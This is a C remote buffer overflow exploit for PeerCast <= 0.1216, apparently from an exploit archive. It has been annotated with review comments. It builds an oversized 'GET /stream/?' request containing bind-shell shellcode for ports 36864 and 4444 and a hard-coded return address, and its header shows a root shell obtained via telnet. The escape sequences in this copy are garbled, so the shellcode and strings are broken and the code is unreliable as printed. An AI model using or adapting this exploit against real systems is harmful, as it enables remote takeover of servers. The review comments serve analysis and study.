# Title : PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit (2)
# Published : 2006-03-12
# Author : darkeagle
/*
PeerCast <=0.1216 remote exploit
/ by Darkeagle
/ 09.03.06
/
gr33tz: bl4ck guys, unl0ck guys, rst/ghc guys, 0x557 guys, ph4nt0m guys, sh0k and many otherz.
/
/ http://unl0ck.net
*******************************************
root@localhost darkeagle]# telnet localhost 36864
Trying 127.0.0.1...
Connected to localhost (127.0.0.1).
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
uname -a;
Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux
: command not found
*******************************************
Special tnx goes to: Dr_UF0 for targets support :)
/
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
/* Alternative payload, NOT used by main(): the memcpy that would append it is
 * commented out there. The author's note says it binds a listener on TCP port 4444.
 * As copied on this page the "\x" escapes have lost their backslashes, so the array
 * holds the literal ASCII text "x31xc9..." (three characters per intended byte)
 * rather than the intended byte values. */
char scode[]= // binds 4444 port
"x31xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x85"
"x4fxcaxdfx83xebxfcxe2xf4xb4x94x99x9cxd6x25xc8xb5"
"xe3x17x53x56x64x82x4ax49xc6x1dxacxb7x94x13xacx8c"
"x0cxaexa0xb9xddx1fx9bx89x0cxaex07x5fx35x29x1bx3c"
"x48xcfx98x8dxd3x0cx43x3ex35x29x07x5fx16x25xc8x86"
"x35x70x07x5fxccx36x33x6fx8ex1dxa2xf0xaax3cxa2xb7"
"xaax2dxa3xb1x0cxacx98x8cx0cxaex07x5f";
/* Payload that main() appends after the 0x55 filler. The author's note says it binds
 * a listener on TCP port 36864, which matches the "telnet localhost 36864" transcript
 * in the header comment. The final groups (2f 62 69 6e 2f 73 68) spell "/bin/sh".
 * Intended length is 124 bytes plus the terminating NUL; as copied on this page the
 * "\x" escapes have lost their backslashes, so the array is 372 literal characters
 * plus NUL (sizeof == 373), which matters for the memcpy in main(). */
char linuxshellcode[]= // binds 36864 port
"xebx6ex5ex29xc0x89x46x10"
"x40x89xc3x89x46x0cx40x89"
"x46x08x8dx4ex08xb0x66xcd"
"x80x43xc6x46x10x10x88x46"
"x08x31xc0x31xd2x89x46x18"
"xb0x90x66x89x46x16x8dx4e"
"x14x89x4ex0cx8dx4ex08xb0"
"x66xcdx80x89x5ex0cx43x43"
"xb0x66xcdx80x89x56x0cx89"
"x56x10xb0x66x43xcdx80x86"
"xc3xb0x3fx29xc9xcdx80xb0"
"x3fx41xcdx80xb0x3fx41xcd"
"x80x88x56x07x89x76x0cx87"
"xf3x8dx4bx0cxb0x0bxcdx80"
"xe8x8dxffxffxffx2fx62x69"
"x6ex2fx73x68";
/* Print the command-line synopsis to stdout.
 * proga: program name (argv[0] from main), substituted into the message.
 * The trailing "n" is a literal character in this copy of the file (the escape
 * backslash is missing), so no newline is emitted. */
void usage(char *proga)
{
	fprintf(stdout, "usage> %s <ipaddr> <port>n", proga);
}
/*
 * Entry point.
 *   argv[1]: target IPv4 address in dotted-quad form (inet_addr; no name resolution)
 *   argv[2]: TCP port, converted with atoi()
 * Builds a single HTTP request "GET /stream/?" + 800 bytes of 0x55 filler with a
 * hard-coded return address written at offset 780 + linuxshellcode + "rnrn", sends it
 * once and exits. Nothing is read back from the socket; the header transcript shows the
 * outcome being checked out of band against the port the payload binds (36864).
 * Always returns 0; bad usage and a failed connect() both exit(0) as well.
 * NOTE(review): system(), atoi() and exit() are used but <stdlib.h> is not included,
 * so these are implicit declarations under C99 and later.
 */
int main( int argc, char *argv[] )
{
int sock;
struct sockaddr_in addr; // only sin_family, sin_port and sin_addr are set; the rest is uninitialised
char evil[1024], get[1024];
// Single hard-coded target address for one distro build. The banner below says 0.1215 and the
// page title 0.1216, while this comment names 0.1211, so which build the value belongs to is unclear.
long retaddr = 0x438a3e3c; // mandrake 10.0 rus - peercast 0.1211.tgz
system("clear"); // runs "clear" through /bin/sh just to wipe the terminal; result ignored
// In this copy the escape backslashes are missing, so the trailing "n" in every printf
// format is a literal character and no newlines are printed.
printf(".::: PeerCast <= 0.1215 remote exploit :::.n");
printf(" by Darkeagle nn");
printf(" bug founder: Leon Juranicn");
printf("n keep private!!!n");
if ( argc < 3 )
{
usage(argv[0]);
exit(0); // exit status 0 even on a usage error
}
// socket() result is not checked; -1 would be passed straight to connect().
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2])); // atoi: no range or error check, non-numeric input becomes port 0
addr.sin_addr.s_addr = inet_addr(argv[1]); // a malformed address yields INADDR_NONE, which is not detected
printf("nexp> connecting...n");
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 )
{
printf("exp> connection failedn");
exit(0); // socket is not closed and the status is still 0 despite the failure
}
printf("exp> connection enstabilished!n");
// Layout of evil[] after this section: [0..799] 0x55 filler, retaddr stored over bytes
// starting at 780 (4 bytes where long is 32-bit, 8 where it is 64-bit), then the
// linuxshellcode array including its NUL, then the four characters "rnrn".
memset(evil, 0x00, 1024);
memset(get, 0x00, 1024);
memset(evil, 0x55, 800);
//memcpy(evil+strlen(evil), &scode, sizeof(scode));  // alternative payload (port 4444), left disabled
// strlen(evil) is 800 here because the first memset NUL-terminated the filler. sizeof copies the
// trailing NUL too, which the strcat below depends on. As copied on this page (three characters
// per intended byte) sizeof(linuxshellcode) is 373, so 800 + 373 runs past the end of evil[1024].
memcpy(evil+strlen(evil), &linuxshellcode, sizeof(linuxshellcode));
strcpy(get, "GET /stream/?");
// Type-punning, possibly unaligned store. On an LP64 host long is 8 bytes, so this clobbers
// bytes 780..787 rather than the 4 bytes presumably intended.
*(long*)&evil[780] = retaddr;
// Presumably meant to be the CRLF CRLF request terminator; with the backslashes missing in
// this copy the literal characters "rnrn" are appended instead.
strcat(evil, "rnrn");
strcat(get, evil); // no bounds check against get[1024]; prefix is 13 bytes plus the whole of evil
sleep(1);
printf("exp> sending evil datan");
send(sock, get, strlen(get), 0); // return value (error or short send) ignored
printf("exp> done!n");
printf("exp> check shelln");
close(sock);
return 0;
}